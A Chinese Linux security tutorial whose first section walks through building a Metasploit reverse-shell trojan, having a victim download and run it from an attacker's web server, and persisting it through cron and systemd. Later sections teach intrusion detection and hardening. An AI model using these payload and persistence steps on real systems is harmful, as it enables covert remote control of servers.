网安--Linux基础知识（二）

一、Linux 木马入侵实战：从制作到持久化控制

学到这里，我们正式进入远程控制与持久化环节，这是渗透测试中最核心的后门技术之一，也是理解服务器安全风险的关键。

1. 木马制作：Metasploit 生成 Linux 后门

Kali Linux 内置的MSF（Metasploit）是生成与控制木马的标准工具，本次使用反向 TCP 木马，让受害机主动连接攻击机，突破防火墙限制。

• 生成木马命令：

msfvenom -p linux/x64/shell/reverse_tcp LHOST=攻击机IP LPORT=端口 -f elf -o shell.elf

• 启动监听：

msfconsole use exploit/multi/handler set payload linux/x64/shell/reverse_tcp set lhost 攻击机IP set lport 端口 run

2. 木马植入：让目标下载并运行

1. 攻击机开启 Apache 服务：service apache2 start
2. 把木马放到网页目录：mv shell.elf /var/www/html
3. 受害机下载木马：wget http://攻击机IP/shell.elf -O shell.elf
4. 关键：添加执行权限：chmod +x shell.elf
5. 运行上线：./shell.elf

重点：Linux 文件必须有x 执行权限才能运行，这也是权限防护的核心点。

3. 持久化控制：开机自启永不掉线

单次运行容易被发现，攻击者会用计划任务、系统服务实现持久化。

（1）计划任务 Cron（定时运行）

查看：crontab -l编辑：crontab -e每分钟执行木马：

* * * * * /shell.elf

（2）系统服务 Systemd（最强持久化）

创建服务文件：/etc/systemd/system/test.service

[Unit] Description=test After=network.target [Service] Type=simple ExecStart=/shell.elf Restart=always [Install] WantedBy=multi-user.target

加载并开机自启：

systemctl daemon-reload systemctl start test.service systemctl enable test.service

三者区别：

• 启动项：开机一次运行
• 计划任务：定时重复运行
• 系统服务：崩溃自动重启，最隐蔽、最稳定

二、Linux 入侵检测：快速揪出木马与后门

学会攻击，更要学会防守排查。这部分是运维与安全工程师的核心技能，能快速定位异常入侵。

1. 日志排查：找到入侵痕迹

Linux 最重要的两个日志：

• 系统日志：/var/log/syslog
• 登录认证日志：/var/log/auth.log（SSH 爆破全在这里）

常用排查命令：

# 实时看系统日志 tail -f /var/log/syslog # 看SSH失败登录 journalctl -u ssh | grep 'Failed password' # 看SSH成功登录 journalctl -u ssh | grep 'Accepted password'

2. 可疑账户排查

后门用户是最常见入侵痕迹，必须定期检查：

# 查看所有UID=0的超级用户（正常只有root） awk -F: '$3==0{print $1}' /etc/passwd # 查看有sudo权限的用户 grep -v "^#" /etc/sudoers | grep "ALL="

处理异常用户：

• 强制下线：pkill -KILL -u 用户名
• 禁用用户：usermod -L 用户名
• 删除用户：userdel -r 用户名

3. 进程与网络连接排查

# 看所有进程 ps -ef # 实时看资源（找挖矿木马） top # 看网络连接（找外连IP） ss -ntap netstat -ntulnp

异常特征：

• 陌生外连 IP
• CPU / 内存长期 100%
• 不知名程序占用端口

4. 计划任务与启动项排查

# 查看所有用户计划任务 crontab -l -u root crontab -l -u 其他用户 # 查看开机启动项 ls /etc/init.d/ systemctl list-unit-files --type=service --state=enabled

三、Linux 系统安全加固：从源头挡住攻击

检测是事后，加固才是事前防御。以下是企业级通用加固方案，简单有效。

1. 账户与 SSH 加固

1. 禁止 root 远程登录（最重要）

nano /etc/ssh/sshd_config PermitRootLogin no PasswordAuthentication no # 尽量用密钥登录 systemctl restart sshd

1. 删除无用 / 陌生用户
2. 所有用户设置强密码

2. 防火墙加固

Ubuntu（ufw）：

ufw enable ufw allow 22/tcp ufw allow 80/tcp ufw default deny incoming ufw status

CentOS（firewalld）：

systemctl start firewalld && systemctl enable firewalld firewall-cmd --permanent --add-port=22/tcp firewall-cmd --reload

3. 系统与权限加固

1. 定期更新系统：

# Ubuntu apt update && apt upgrade -y # CentOS yum update -y

1. 最小权限原则：

• 重要目录权限：chmod 700 /root
• 不随意使用chmod 777、rm -rf

1. 关闭不必要开机自启服务

4. 审计监控

安装 auditd 监控关键命令：

apt install auditd systemctl start auditd auditctl -w /usr/sbin/useradd -p x -k useradd_exec